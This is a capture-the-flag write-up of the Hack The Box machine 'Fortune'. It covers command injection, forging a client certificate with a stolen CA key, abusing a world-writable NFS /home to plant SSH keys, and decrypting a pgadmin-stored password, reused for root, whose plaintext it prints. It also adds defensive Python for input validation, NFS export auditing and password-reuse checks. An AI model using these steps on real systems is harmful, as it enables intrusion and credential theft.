@3rg1s
Last active October 30, 2019 13:06

Hackthebox Fortune🥠

Reconnaissance

From nmap ports 22, 80, 443 are open

root@kali:~# nmap -sC -sV 10.10.10.127
Starting Nmap 7.60 ( https://nmap.org ) at 2019-05-14 22:07 EEST
Nmap scan report for 10.10.10.127
Host is up (0.16s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE    VERSION
22/tcp  open  ssh        OpenSSH 7.9 (protocol 2.0)
| ssh-hostkey: 
|   2048 07:ca:21:f4:e0:d2:c6:9e:a8:f7:61:df:d7:ef:b1:f4 (RSA)
|   256 30:4b:25:47:17:84:af:60:e2:80:20:9d:fd:86:88:46 (ECDSA)
|_  256 93:56:4a:ee:87:9d:f6:5b:f9:d9:25:a6:d8:e0:08:7e (EdDSA)
80/tcp  open  http       OpenBSD httpd
|_http-server-header: OpenBSD httpd
|_http-title: Fortune
443/tcp open  ssl/https?
|_ssl-date: TLS randomness does not represent time

Website port 80

The db parameter is vulnerable to command injection: appending ;{command} to the value of db makes the server execute {command}.

(screenshot: rce_on_db_parameter)
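To make the injection concrete from the defender's side, here is an added Python example (not the box's application code, whose source the writeup does not show) that models the weak pattern, a shell string built from the db parameter, next to a hardened version that validates the name against an allow-list of database files and passes it as its own argv element so no shell ever parses it. The fortune database directory and all helper names are assumptions.

```python
import re
import subprocess
from pathlib import Path

# Assumed location of the fortune databases (hypothetical; adjust for the host).
FORTUNE_DIR = "/usr/share/games/fortune"


def vulnerable_command(db):
    """The weak pattern: the request parameter is spliced into a shell string.
    Run with shell=True, a ';' in db ends the fortune command and the shell
    executes whatever follows it, which is the behaviour the writeup reports."""
    return "fortune %s" % db


def allowed_dbs(fortune_dir=FORTUNE_DIR):
    """Build the allow-list from the database files actually on disk
    (fortune keeps a .dat index next to each database; skip those)."""
    d = Path(fortune_dir)
    if not d.is_dir():
        return set()
    return {p.name for p in d.iterdir() if p.is_file() and not p.name.endswith(".dat")}


def safe_argv(db, allowed):
    """Hardened form: strict character check, allow-list membership, and an
    argv list so the value is never interpreted by a shell."""
    if not re.fullmatch(r"[A-Za-z0-9_-]{1,64}", db):
        raise ValueError("rejected db name (bad characters): %r" % db)
    if db not in allowed:
        raise ValueError("rejected db name (not in allow-list): %r" % db)
    return ["fortune", db]


def is_safe_db(db, allowed):
    """Boolean wrapper around safe_argv for callers that only need a verdict."""
    try:
        safe_argv(db, allowed)
        return True
    except ValueError:
        return False


def run_fortune(db, allowed):
    """Execute fortune with a validated database name; shell=False throughout."""
    argv = safe_argv(db, allowed)
    return subprocess.run(argv, capture_output=True, text=True, check=True).stdout


if __name__ == "__main__":
    payload = "fortunes;id"  # constructed input of the ';{command}' shape
    print("weak pattern hands the shell:", repr(vulnerable_command(payload)))
    try:
        safe_argv(payload, allowed_dbs() or {"fortunes"})
    except ValueError as err:
        print("hardened version:", err)
```

The character check alone would already reject the payload; the allow-list is the second layer, so a name such as ../../etc/passwd or an unexpected file in the directory is refused even if the regex were later loosened.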

A reverse shell isn't possible from here. Two juicy files are located at /home/bob/ca/intermediate/certs/intermediate.cert.pem and /home/bob/ca/intermediate/private/intermediate.key.pem. The first file is a certificate (the public part) and the second one is its private key. With those two files I created a PKCS#12 (.p12) client certificate.

root@kali:~# openssl req -newkey rsa:4096 -keyout alice_key.pem -out alice_csr.pem -nodes -days 365 -subj "/CN=Alice"
root@kali:~# openssl x509 -req -in alice_csr.pem -CA intermediate.cert.pem -CAkey intermediate.key.pem -out alice_cert.pem -set_serial 01 -days 365
root@kali:~# openssl pkcs12 -export -clcerts -in intermediate.cert.pem -inkey intermediate.key.pem -out alice.p12

Website port 443

At first it gives an error, but after importing the alice.p12 there is some progress. Click generate and


Using the private key to access the SSH port as nfsuser (found inside /etc/passwd):

root@kali:~# chmod 600 priv.key
root@kali:~# ssh -i nfsuser.priv nfsuser@10.10.10.127

Port 2049 is open now

root@kali:~# nmap 10.10.10.127

Starting Nmap 7.60 ( https://nmap.org ) at 2019-05-15 00:41 EEST
Nmap scan report for 10.10.10.127
Host is up (0.11s latency).
Not shown: 992 closed ports
PORT     STATE    SERVICE
22/tcp   open     ssh
80/tcp   open     http
111/tcp  open     rpcbind
443/tcp  open     https
1947/tcp filtered sentinelsrm
2049/tcp open     nfs
6668/tcp filtered irc
8081/tcp open     blackice-icecap

Nmap done: 1 IP address (1 host up) scanned in 20.79 seconds

Enumerating NFS mounts

root@kali:# showmount -e 10.10.10.127
Export list for 10.10.10.127:
/home (everyone)

Mounting /home folder

root@kali:# mkdir /tmp/home/ && mount 10.10.10.127:/home/ /tmp/home/

SSH access as charlie

Having read/write permissions on charlie's home directory over NFS, I append my public SSH key to his authorized_keys and get SSH access as charlie.

root@kali:/tmp/home# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/fuxsocy/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/fuxsocy/.ssh/id_rsa.
Your public key has been saved in /home/fuxsocy/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:fW1/G5sQAc0x4l/0A/0MlkaH1X1bkLxfyHZETD7c76o root@kali
The key's randomart image is:
+---[RSA 2048]----+
|           oo*=@B|
|          . oo&+X|
|           . = @O|
|         .  ..B.O|
|        S . .+ooo|
|           . ..o.|
|             . .+|
|              ..*|
|            E..+ |
+----[SHA256]-----+

root@kali:# cat /home/fuxsocy/.ssh/id_rsa.pub >> /tmp/home/charlie/.ssh/authorized_keys
root@kali:# ssh -i /home/fuxsocy/.ssh/id_rsa charlie@10.10.10.127

Last login: Tue May 14 16:52:51 2019 from 10.10.16.86
OpenBSD 6.4 (GENERIC) #349: Thu Oct 11 13:25:13 MDT 2018

Welcome to OpenBSD: The proactively secure Unix-like operating system.
fortune$ 
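The two findings this section chains together, an NFS export of /home to everyone and a home directory that is writable from the client, are things a defender can check for in the exports file itself. The Python below is an added example (not from the writeup and not OpenBSD's code) that audits exports(5)-style lines; the file content is constructed, with the first line mirroring the /home (everyone) export showmount reported. The option subset it understands (-ro, -network=, -mask=, -maproot=, -mapall=, -alldirs) is an assumption about what a typical file contains.

```python
import shlex

# Constructed sample in OpenBSD exports(5) style; not the box's real /etc/exports.
SAMPLE_EXPORTS = """\
# constructed sample
/home
/srv/pub -ro -network=10.10.10.0 -mask=255.255.255.0
/export/build -maproot=root -alldirs buildhost.example
/export/share -mapall=nobody -ro fileserver.example
"""


def parse_exports(text):
    """Return one dict per export line: exported paths, options, and hosts.
    Tokens starting with '/' are paths, '-' marks an option, anything else is
    a host name; a line with no hosts and no -network is exported to everyone."""
    entries = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        tokens = shlex.split(line)
        entries.append({
            "paths": [t for t in tokens if t.startswith("/")],
            "options": [t for t in tokens if t.startswith("-")],
            "hosts": [t for t in tokens if not t.startswith(("/", "-"))],
        })
    return entries


def audit_export(entry):
    """List the risky properties of one export entry."""
    findings = []
    opts = entry["options"]
    restricted = entry["hosts"] or any(o.startswith("-network=") for o in opts)
    read_only = "-ro" in opts
    if not restricted:
        findings.append("exported to everyone (no host or -network restriction)")
    if not read_only:
        findings.append("read-write export")
    if any(o.startswith("-maproot=") for o in opts):
        findings.append("root squashing disabled via -maproot")
    if not read_only and any(p.startswith("/home") for p in entry["paths"]):
        findings.append("home directories writable over NFS (authorized_keys can be altered)")
    return findings


def audit_exports(text):
    """Map each export's path list to its findings."""
    return {", ".join(e["paths"]): audit_export(e) for e in parse_exports(text)}


if __name__ == "__main__":
    for path, findings in audit_exports(SAMPLE_EXPORTS).items():
        print(path, "->", "; ".join(findings) or "ok")
```

On a real host the same function can be fed the output of cat /etc/exports; anything reported as both "exported to everyone" and "read-write" reproduces the condition that let the NFS client write into charlie's .ssh directory.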

Privilege escalation

A file called mbox contains:

fortune$ cat mbox
From bob@fortune.htb Sat Nov  3 11:18:51 2018
Return-Path: <bob@fortune.htb>
Delivered-To: charlie@fortune.htb
Received: from localhost (fortune.htb [local])
       by fortune.htb (OpenSMTPD) with ESMTPA id bf12aa53
       for <charlie@fortune.htb>;
       Sat, 3 Nov 2018 11:18:51 -0400 (EDT)
From:  <bob@fortune.htb>
Date: Sat, 3 Nov 2018 11:18:51 -0400 (EDT)
To: charlie@fortune.htb
Subject: pgadmin4
Message-ID: <196699abe1fed384@fortune.htb>
Status: RO

Hi Charlie,

Thanks for setting-up pgadmin4 for me. Seems to work great so far.
BTW: I set the dba password to the same as root. I hope you don't mind.

Cheers,

Bob

fortune$

Finding the db file and decrypting the password

In /var/appsrv/pgadmin4/ there is a file pgadmin4.db which holds an encrypted string, utUU0jkamCZDmqFLOrAuPjFxL0zp8zWzISe5MF0GY/l8Silrmu3caqrtjaVjLQlvFFEgESGz, and the key it was encrypted with, $pbkdf2-sha512$25000$z9nbm1Oq9Z5TytkbQ8h5Dw$Vtx9YWQsgwdXpBnsa8BtO5kLOdQGflIZOQysAy7JdTVcRbv/6csQHAJCAIJT9rLFBawClFyMKnqKNL5t3Le9vg.

Adding print decrypt("utUU0jkamCZDmqFLOrAuPjFxL0zp8zWzISe5MF0GY/l8Silrmu3caqrtjaVjLQlvFFEgESGz","$pbkdf2-sha512$25000$z9nbm1Oq9Z5TytkbQ8h5Dw$Vtx9YWQsgwdXpBnsa8BtO5kLOdQGflIZOQysAy7JdTVcRbv/6csQHAJCAIJT9rLFBawClFyMKnqKNL5t3Le9vg") at the end of crypto.py, located at /usr/local/pgadmin4/pgadmin4-3.4/web/pgadmin/utils/crypto.py, decrypts the encrypted string:

root@kali:# python crypto.py
R3us3-0f-a-P4ssw0rdl1k3th1s?_B4D.ID3A!
None
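The second string is in passlib's pbkdf2-sha512 hash format: it is the hash of the pgadmin user's login password, and pgadmin derives the key for the stored server password from it, so whoever can read pgadmin4.db holds both the ciphertext and its key. What turns the recovered database password into root is the reuse Bob's mail admits to. The Python below is an added example, not pgadmin's code and not its decrypt routine: using only the standard library it parses that hash format and checks a recovered password against any number of stored hashes in it, which is the check a defender runs to find accounts sharing a password. The only value taken from the page is the hash itself (used to show its parameters); make_hash and the test hashes are constructed for illustration.

```python
import base64
import hashlib
import hmac
import os

# The hash found in pgadmin4.db, copied from the writeup above.
PAGE_HASH = ("$pbkdf2-sha512$25000$z9nbm1Oq9Z5TytkbQ8h5Dw$"
             "Vtx9YWQsgwdXpBnsa8BtO5kLOdQGflIZOQysAy7JdTVcRbv/6csQHAJCAIJT9rLFBawClFyMKnqKNL5t3Le9vg")


def ab64_decode(s):
    """passlib's 'adapted base64': '.' stands in for '+' and '=' padding is dropped."""
    s = s.replace(".", "+")
    return base64.b64decode(s + "=" * (-len(s) % 4))


def ab64_encode(b):
    return base64.b64encode(b).decode().rstrip("=").replace("+", ".")


def parse_pbkdf2_sha512(h):
    """Split '$pbkdf2-sha512$rounds$salt$checksum' into (rounds, salt, checksum)."""
    parts = h.split("$")
    if len(parts) != 5 or parts[0] != "" or parts[1] != "pbkdf2-sha512":
        raise ValueError("not a passlib pbkdf2-sha512 hash")
    return int(parts[2]), ab64_decode(parts[3]), ab64_decode(parts[4])


def make_hash(password, salt=None, rounds=25000):
    """Produce a hash in the same format (constructed here for the examples)."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha512", password.encode(), salt, rounds, 64)
    return "$pbkdf2-sha512$%d$%s$%s" % (rounds, ab64_encode(salt), ab64_encode(dk))


def verify(password, h):
    """Constant-time comparison of PBKDF2-HMAC-SHA512(password) with the stored checksum."""
    rounds, salt, checksum = parse_pbkdf2_sha512(h)
    dk = hashlib.pbkdf2_hmac("sha512", password.encode(), salt, rounds, len(checksum))
    return hmac.compare_digest(dk, checksum)


def reuse_report(known_password, hashes):
    """Names of the accounts (name -> hash) whose hash matches an already-known password."""
    return [name for name, h in hashes.items() if verify(known_password, h)]


if __name__ == "__main__":
    rounds, salt, checksum = parse_pbkdf2_sha512(PAGE_HASH)
    print("page hash: %d rounds, %d-byte salt, %d-byte checksum" % (rounds, len(salt), len(checksum)))
    # Constructed accounts: two of them share a password.
    accounts = {"dba": make_hash("shared-secret"), "root": make_hash("shared-secret"),
                "charlie": make_hash("different")}
    print("accounts reusing the recovered password:", reuse_report("shared-secret", accounts))
```

The same verify function works for any password store that uses the passlib pbkdf2-sha512 format; the two things to note about the page's hash are the 25000 rounds and that the key pgadmin feeds to its cipher is this very string, not a secret kept elsewhere.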

Root Shell

fortune$ su -
Password:
fortune# 
fortune# cat /home/charlie/user.txt
ada0a[redacted]
fortune# cat /root/root.txt
335af[redacted]
fortune# 